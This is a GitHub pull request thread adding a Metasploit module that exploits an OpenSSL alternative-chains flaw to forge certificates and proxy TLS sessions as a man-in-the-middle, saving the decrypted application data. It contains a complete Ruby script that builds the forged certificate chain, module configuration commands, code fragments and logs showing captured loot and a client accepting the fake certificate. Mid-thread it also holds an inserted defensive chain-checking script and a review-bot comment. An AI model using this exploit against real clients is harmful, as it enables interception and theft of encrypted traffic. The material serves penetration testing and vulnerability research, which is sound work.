Add openssl_altchainsforgery_mitm_proxy.rb #5735

Merged
merged 2 commits into from Jul 24, 2015

@rcvalle
Contributor

rcvalle commented Jul 16, 2015

This module exploits a logic error in OpenSSL by impersonating the server and sending a specially-crafted chain of certificates, resulting in certain checks on untrusted certificates to be bypassed on the client, allowing it to use a valid leaf certificate as a CA certificate to sign a fake certificate. The SSL/TLS session is then proxied to the server allowing the session to continue normally and application data transmitted between the peers to be saved. This module requires an active man-in-the-middle attack.

Add openssl_altchainsforgery_mitm_proxy.rb
This module exploits a logic error in OpenSSL by impersonating the
server and sending a specially-crafted chain of certificates, resulting
in certain checks on untrusted certificates to be bypassed on the
client, allowing it to use a valid leaf certificate as a CA certificate
to sign a fake certificate. The SSL/TLS session is then proxied to the
server allowing the session to continue normally and application data
transmitted between the peers to be saved. This module requires an
active man-in-the-middle attack.
@rcvalle

Contributor

rcvalle commented Jul 16, 2015

To test this exploit module:

  1. Run the following script to create the certificates:
require 'openssl'

root_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA')
root_ca_key = OpenSSL::PKey::RSA.new(2048)
root_ca_cert = OpenSSL::X509::Certificate.new
root_ca_cert.issuer = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA')
root_ca_cert.not_after = Time.now + 86400
root_ca_cert.not_before = Time.now
root_ca_cert.public_key = root_ca_key.public_key
root_ca_cert.serial = 0
root_ca_cert.subject = root_ca_name
root_ca_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, root_ca_cert)
root_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
root_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
root_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
root_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new)

inter_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Intermediate Inc./CN=Intermediate CA')
inter_ca_key = OpenSSL::PKey::RSA.new(2048)
inter_ca_cert = OpenSSL::X509::Certificate.new
inter_ca_cert.issuer = root_ca_name
inter_ca_cert.not_after = Time.now + 86400
inter_ca_cert.not_before = Time.now
inter_ca_cert.public_key = inter_ca_key.public_key
inter_ca_cert.serial = 0
inter_ca_cert.subject = inter_ca_name
inter_ca_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, inter_ca_cert)
inter_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
inter_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
inter_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
inter_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new)

subinter_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Example Inc./CN=Example CA')
subinter_ca_key = OpenSSL::PKey::RSA.new(2048)
subinter_ca_cert = OpenSSL::X509::Certificate.new
subinter_ca_cert.issuer = subinter_ca_name
subinter_ca_cert.not_after = Time.now + 86400
subinter_ca_cert.not_before = Time.now
subinter_ca_cert.public_key = subinter_ca_key.public_key
subinter_ca_cert.serial = 0
subinter_ca_cert.subject = subinter_ca_name
subinter_ca_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(inter_ca_cert, subinter_ca_cert)
subinter_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
subinter_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
subinter_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
subinter_ca_cert.sign(subinter_ca_key, OpenSSL::Digest::SHA1.new)

open('roots.pem', 'w') do |io|
  io.write(inter_ca_cert.to_pem)
  io.write(subinter_ca_cert.to_pem)
end

subinter_ca_cert.issuer = inter_ca_name
subinter_ca_cert.sign(inter_ca_key, OpenSSL::Digest::SHA1.new)

open('subinter_ca.pem', 'w') do |io|
  io.write(subinter_ca_cert.to_pem)
end

leaf_name = OpenSSL::X509::Name.parse('/C=US/O=Example Inc./CN=*.example.com')
leaf_key = OpenSSL::PKey::RSA.new(2048)
leaf_cert = OpenSSL::X509::Certificate.new
leaf_cert.issuer = subinter_ca_name
leaf_cert.not_after = Time.now + 3600
leaf_cert.not_before = Time.now
leaf_cert.public_key = leaf_key.public_key
leaf_cert.serial = 0
leaf_cert.subject = leaf_name
leaf_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(subinter_ca_cert, leaf_cert)
leaf_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:FALSE', true))
# It isn't mentioned anywhere but the valid leaf certificate must not
# contain the keyUsage extension or it must have at least the keyCertSign
# bit set (see X509_check_issued function in crypto/x509v3/v3_purp.c);
# otherwise; X509_verify_cert fails with
# X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY. Do NOT uncomment the
# following line.
# leaf_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment'))
leaf_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
leaf_cert.sign(subinter_ca_key, OpenSSL::Digest::SHA1.new)

open('untrusted.pem', 'w') do |io|
  io.write(subinter_ca_cert.to_pem)
  io.write(leaf_cert.to_pem)
end

open('leaf.pem', 'w') do |io|
  io.write(leaf_cert.to_pem)
end

open('key.pem', 'w') do |io|
  io.write(leaf_key.to_pem)
end

fake_name = OpenSSL::X509::Name.parse('/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com')
fake_key = OpenSSL::PKey::RSA.new(2048)
fake_cert = OpenSSL::X509::Certificate.new
fake_cert.issuer = leaf_name
fake_cert.not_after = Time.now + 3600
fake_cert.not_before = Time.now
fake_cert.public_key = fake_key.public_key
fake_cert.serial = 0
fake_cert.subject = fake_name
fake_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(leaf_cert, fake_cert)
fake_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:FALSE', true))
fake_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment'))
fake_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
fake_cert.sign(leaf_key, OpenSSL::Digest::SHA1.new)

open('bad.pem', 'w') do |io|
  io.write(fake_cert.to_pem)
end
  2. Run this exploit module:
use auxiliary/server/openssl_altchainsforgery_mitm_proxy
set CACERT /path/to/subinter_ca.pem
set CERT /path/to/leaf.pem
set KEY /path/to/key.pem
set HOST www.example.com
  3. If you have a vulnerable version of OpenSSL installed, use the SSL/TLS client program:
openssl s_client -connect localhost:443 -CAfile /path/to/roots.pem

The fake certificate should be verified without errors and you should see "Verify return code: 0 (ok)" in the output.
  4. Alternatively, clone the OpenSSL git repository.
  5. Change the current working directory to the working tree of the cloned repository.
  6. To test on OpenSSL 1.0.2 stable branch:

git checkout origin/OpenSSL_1_0_2-stable
git reset --hard f404943bcab4898d18f3ac1b36479d1d7bbbb9e6

Copy the roots.pem, untrusted.pem, and bad.pem files created to the tests/certs/ directory in the working tree of the cloned repository.

git checkout c0b674b7cbd9146982850523293c74b9131b26d5 crypto/x509/x509_vfy.c
./config && make && make test

To test on OpenSSL 1.0.1 stable branch:

git checkout origin/OpenSSL_1_0_1-stable
git reset --hard d42d1004332f40c1098946b0804791fd3da3e378

Copy the roots.pem, untrusted.pem, and bad.pem files created to the tests/certs/ directory in the working tree of the cloned repository.

git checkout cb6e0ed17a61ae3711d385f517d61be2b4c33a55 crypto/x509/x509_vfy.c
./config && make && make test

The verify_extra_test test should fail.
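
A defender-side check for the condition this test procedure exercises, as an added example that is not part of the PR or the Metasploit module: it walks a presented chain (leaf first) and flags any certificate that signed another without being entitled to, using the same two extensions the script's comment discusses (basicConstraints and keyUsage). The helper names and the sample certificates are constructed for illustration.

```ruby
require 'openssl'

# Build one certificate for the constructed sample chain (names and keys are made up).
def make_cert(subject, key, issuer_cert, issuer_key, ca:, key_usage: nil)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = rand(1..2**31)
  cert.subject = OpenSSL::X509::Name.parse(subject)
  cert.issuer = issuer_cert ? issuer_cert.subject : cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 3600
  ef = OpenSSL::X509::ExtensionFactory.new(issuer_cert || cert, cert)
  cert.add_extension(ef.create_extension('basicConstraints', ca ? 'CA:TRUE' : 'CA:FALSE', true))
  cert.add_extension(ef.create_extension('keyUsage', key_usage, true)) if key_usage
  cert.sign(issuer_key, OpenSSL::Digest.new('SHA256'))
  cert
end

# A certificate may sign others only if basicConstraints asserts CA:TRUE and,
# when a keyUsage extension is present, it includes keyCertSign.
def may_issue?(cert)
  bc = cert.extensions.find { |e| e.oid == 'basicConstraints' }
  return false unless bc && bc.value.split(',').map(&:strip).include?('CA:TRUE')
  ku = cert.extensions.find { |e| e.oid == 'keyUsage' }
  ku.nil? || ku.value.split(',').map(&:strip).include?('Certificate Sign')
end

# Walk a chain ordered leaf-first (as sent in the handshake) and report every
# link where the signer really signed the child but is not allowed to issue.
def chain_violations(chain)
  violations = []
  chain.each_cons(2).with_index(1) do |(child, issuer), depth|
    signed = child.issuer.to_s == issuer.subject.to_s && child.verify(issuer.public_key)
    next unless signed && !may_issue?(issuer)
    violations << "depth #{depth}: #{issuer.subject} is not a CA but signed #{child.subject}"
  end
  violations
end

# Cross-check against the linked OpenSSL: does it accept cert with only root trusted?
def library_accepts?(root, cert, untrusted)
  store = OpenSSL::X509::Store.new
  store.add_cert(root)
  store.verify(cert, untrusted)
end

# Constructed sample: root CA -> ordinary leaf (CA:FALSE) -> certificate signed by that leaf.
def sample_chain
  root_key, leaf_key, forged_key = Array.new(3) { OpenSSL::PKey::RSA.new(2048) }
  root = make_cert('/O=Sample/CN=Sample Root CA', root_key, nil, root_key,
                   ca: true, key_usage: 'keyCertSign,cRLSign')
  leaf = make_cert('/O=Sample/CN=leaf.sample.test', leaf_key, root, root_key, ca: false)
  forged = make_cert('/O=Sample/CN=forged.sample.test', forged_key, leaf, leaf_key, ca: false)
  { root: root, leaf: leaf, forged: forged }
end

if __FILE__ == $PROGRAM_NAME
  s = sample_chain
  puts chain_violations([s[:forged], s[:leaf], s[:root]])
  puts "library accepts forged: #{library_accepts?(s[:root], s[:forged], [s[:leaf]])}"
end
```

Running `library_accepts?` against each OpenSSL build in a fleet gives a quick regression signal, while `chain_violations` works independently of the library's verdict and can be applied to chains captured from the wire.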

@wvu-r7

Contributor

wvu-r7 commented Jul 17, 2015

Great work, @rcvalle!

@jvazquez-r7 jvazquez-r7 self-assigned this Jul 17, 2015

register_options(
[
OptString.new('CACERT', [ true, "The leaf certificate's CA certificate", nil]),

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

I feel like the module should allow generating the CERTs for the HOST being targeted. Otherwise anyone trying to use this module must be aware of the correct way to create the certificates, and according to your Ruby code, it looks like there are some caveats to take into account:

# It isn't mentioned anywhere but the valid leaf certificate must not
# contain the keyUsage extension or it must have at least the keyCertSign
# bit set (see X509_check_issued function in crypto/x509v3/v3_purp.c);
# otherwise; X509_verify_cert fails with
# X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY. Do NOT uncomment the
# following line.
# leaf_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment'))

Since the Ruby code is already there (in the PR), I'm not sure why cert creation isn't facilitated from within the module... I guess I'm missing something... I'm just doing some monkey review just now... :( So clarifications are welcome!

@rcvalle

rcvalle Jul 17, 2015

Contributor

I didn't understand your question. The module does create the certificate for the HOST (i.e., fake_cert). However, you need a valid leaf certificate, which you already have or will obtain from a real CA, to sign it. This valid leaf certificate must not contain the keyUsage extension or must have at least the keyCertSign bit set (or be a proxy certificate and have the digitalSignature bit set). The script above creates the certificates to simulate it.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

And this clarifies :-) thanks!

context.key = fake_key
tcp_server = TCPServer.new(local_host, local_port)
proxy = OpenSSL::SSL::SSLServer.new(tcp_server, context)

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

Would be neat if Rex::Socket::SslTcpServer could be used instead. Rex::Socket::SslTcpServer allows providing an OpenSSL::SSL::SSLContext to use with the sslctx attribute.

Again, maybe I'm forgetting something. If you tried to use Rex::Socket::SslTcpServer already and it can not be used because of anything, feel free to clarify :-)

Also, ping @hmoore-r7 and/or @jlee-r7 because they use to master Rex::Socket in case I'm asking / providing erroneous feedback!

@rcvalle

rcvalle Jul 17, 2015

Contributor

I'm having problems with Rex::Socket::TcpServer and I didn't have time to look into those yet. Let me know whether you prefer to merge these PRs now and I fix later or wait for me to add the fixes before merging.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

I see. I bet you mean having problems with Rex::Socket::SslTcpServer. I'd rather use Rex sockets before landing (unless there is a stopper to using them). Same with the Rex relay. Otherwise sounds like the chances of it never being updated increase :P

Of course, unless there is a stopper with using Rex sockets here. I didn't try, but my first impression was that it should be possible.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

On the other hand, if you don't find the time I'll try to help next week, would plan :) I definitely would like to see this module landing into master!

begin
loop do
readable, _, _ = IO.select([client, server])
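
Review bot: In `readable, _, _ = IO.select([client, server])` the call has no timeout, so the relay loop blocks indefinitely when both peers go idle; pass a timeout and handle the nil return. If client and server are OpenSSL::SSL::SSLSocket objects, IO.select only watches the underlying descriptor and does not see data already decrypted and buffered in the SSL layer, so drain each socket until its pending count is zero before selecting again.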

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

On #5513 @hmoore-r7 requested to: "Preferably this would use the existing Rex::Socket APIs instead (or use an existing Relay implementation in Rex)"

If Rex::Socket::SslTcpServer is used probably this comment applies here too. I've the feeling he means to use Rex::Services::LocalRelay... but just in case.. ping @hmoore-r7 :)

@jvazquez-r7

Contributor

jvazquez-r7 commented Jul 17, 2015

Other than the comments above, it works =D

msf auxiliary(openssl_altchainsforgery_mitm_proxy) >
[*] Listening on 0.0.0.0:443
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717162533_default_172.16.158.1_tls.application__193588.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717162542_default_172.16.158.1_tls.application__705199.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717162948_default_172.16.158.1_tls.application__268819.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717163056_default_172.16.158.1_tls.application__431984.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[*] 15 bytes received
[*] 15 bytes sent
[*] 1 bytes received
[*] 1 bytes sent
[*] 177 bytes received
[*] 177 bytes sent
[*] 397 bytes received
[*] 397 bytes sent
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717163205_default_172.16.158.1_tls.application__199193.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[*] 1 bytes received
[*] 1 bytes sent
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717163356_default_172.16.158.1_tls.application__907136.bin

On the client, with a vulnerable openssl:

$ apps/openssl s_client -connect www.example.com:443 -CAfile /tmp/roots.pem 
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
CONNECTED(00000003)
depth=2 C = US, O = Example Inc., CN = Example CA
verify return:1
depth=1 C = US, O = Example Inc., CN = *.example.com
verify return:1
depth=0 C = US, ST = California, L = Mountain View, O = Example Inc, CN = *.example.com
verify return:1
---
Certificate chain
 0 s:/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com
   i:/C=US/O=Example Inc./CN=*.example.com
 1 s:/C=US/O=Example Inc./CN=*.example.com
   i:/C=US/O=Example Inc./CN=Example CA
 2 s:/C=US/O=Example Inc./CN=Example CA
   i:/C=US/O=Intermediate Inc./CN=Intermediate CA
---
Server certificate
subject=/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com
issuer=/C=US/O=Example Inc./CN=*.example.com
---
No client certificate CA names sent
Peer signing digest: SHA512
Server Temp Key: DH, 1024 bits
---
SSL handshake has read 3377 bytes and written 507 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : DHE-RSA-AES256-GCM-SHA384
    Session-ID: D6B43F8F6590CD9EDB93E2073371ACB011224404B80B91C4830FB06FDFE2A940
    Session-ID-ctx: 
    Master-Key: CE4D97205814DE9DB4FB92677C9719264A01A4AC2B84FB65C28DA689C449A51320F86053915C2A8A9743D36593283861
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:

    Start Time: 1437168305
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)

That's awesome and fast work =) Thanks a lot for sharing @rcvalle !

@jvazquez-r7 jvazquez-r7 merged commit 449c751 into rapid7:master Jul 24, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

jvazquez-r7 added a commit that referenced this pull request Jul 24, 2015

@jvazquez-r7

Contributor

jvazquez-r7 commented Jul 24, 2015

@rcvalle, finally I've been doing cleaning by myself and landed. My changes to use Rex sockets are here: 45b4334

I tried to use Rex::Services::LocalRelay as recommended by @hmoore-r7 but unfortunately got the next error when trying to use SSL sockets with a LocalRelay

[07/24/2015 14:31:24] [e(0)] rex: Error in #<Rex::Services::LocalRelay:0x007fb5140f2e38> monitor_relays read: Invalid sysread() call on SSL socket

Apparently LocalRelay isn't working fine with Rex SSL sockets :\ I couldn't find any sample in the framework of Rex SSL sockets working with LocalRelay, so decided to skip. As far as we're using Rex sockets, and also allowing the framework to close sockets / cleanup I think we're fine to land :)

Hope I didn't waste nothing, feel free to review the landed version!

My test before landing:

  • Running the relay on the msfconsole:
msf > resource /tmp/ssl.rc
[*] Processing /tmp/ssl.rc for ERB directives.
resource (/tmp/ssl.rc)> use auxiliary/server/openssl_altchainsforgery_mitm_proxy
resource (/tmp/ssl.rc)> set CACERT /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/subinter_ca.pem
CACERT => /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/subinter_ca.pem
resource (/tmp/ssl.rc)> set CERT /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/leaf.pem
CERT => /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/leaf.pem
resource (/tmp/ssl.rc)> set HOST www.example.com
HOST => www.example.com
resource (/tmp/ssl.rc)> set KEY /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/key.pem
KEY => /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/key.pem
resource (/tmp/ssl.rc)> set SRVHOST 172.16.158.1
SRVHOST => 172.16.158.1
resource (/tmp/ssl.rc)> run
[*] Auxiliary module execution completed
msf auxiliary(openssl_altchainsforgery_mitm_proxy) >
[*] Listening on 172.16.158.1:443
[*] Accepted connection from 172.16.158.132:43084
[*] Connected to www.example.com:443
[*] 6 bytes received
[*] 6 bytes sent
[*] 155 bytes received
[*] 155 bytes sent
[*] 349 bytes received
[*] 349 bytes sent
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150724143748_default_172.16.158.132_tls.application__236080.bin
  • The acquired file:
cat /Users/jvazquez/.msf4/loot/20150724143748_default_172.16.158.132_tls.application__236080.bin
[*] exec: cat /Users/jvazquez/.msf4/loot/20150724143748_default_172.16.158.132_tls.application__236080.bin

hello
HTTP/1.0 400 Bad Request
Content-Type: text/html
Content-Length: 349
Connection: close
Date: Fri, 24 Jul 2015 19:37:47 GMT
Server: ECSF (cpm/F99F)

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title>400 - Bad Request</title>
    </head>
    <body>
        <h1>400 - Bad Request</h1>
    </body>
</html>
@jvazquez-r7

Contributor

jvazquez-r7 commented Jul 24, 2015

Also, on the victim:

$ apps/openssl s_client -connect www.example.com:443 -CAfile /tmp/roots.pem 
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
CONNECTED(00000003)
depth=2 C = US, O = Example Inc., CN = Example CA
verify return:1
depth=1 C = US, O = Example Inc., CN = *.example.com
verify return:1
depth=0 C = US, ST = California, L = Mountain View, O = Example Inc, CN = *.example.com
verify return:1
---
Certificate chain
 0 s:/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com
   i:/C=US/O=Example Inc./CN=*.example.com
 1 s:/C=US/O=Example Inc./CN=*.example.com
   i:/C=US/O=Example Inc./CN=Example CA
 2 s:/C=US/O=Example Inc./CN=Example CA
   i:/C=US/O=Intermediate Inc./CN=Intermediate CA
---
Server certificate
subject=/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com
issuer=/C=US/O=Example Inc./CN=*.example.com
---
No client certificate CA names sent
Peer signing digest: SHA512
Server Temp Key: DH, 1024 bits
---
SSL handshake has read 3346 bytes and written 507 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : DHE-RSA-AES256-GCM-SHA384
    Session-ID: F8B2ED0B57413BED95C326A40A50C02FE51A167CA76D5058C294A3C3D9E81CC8
    Session-ID-ctx: 
    Master-Key: 3D5955221943CB2E7D622C49E0C3F8B0231E6F5E741853268495AA72A332294CF975E96150B84C88D34DE1C91DF29A8D
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:

    Start Time: 1437767403
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
hello
HTTP/1.0 400 Bad Request
Content-Type: text/html
Content-Length: 349
Connection: close
Date: Fri, 24 Jul 2015 19:50:06 GMT
Server: ECSF (cpm/F9C4)

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title>400 - Bad Request</title>
    </head>
    <body>
        <h1>400 - Bad Request</h1>
    </body>
</html>
closed

@rcvalle

Contributor

rcvalle commented Jul 24, 2015

@jvazquez-r7 Looks good to me! Thank you!

@hdm

Contributor

hdm commented Jul 24, 2015

The socket is not SSL yet.
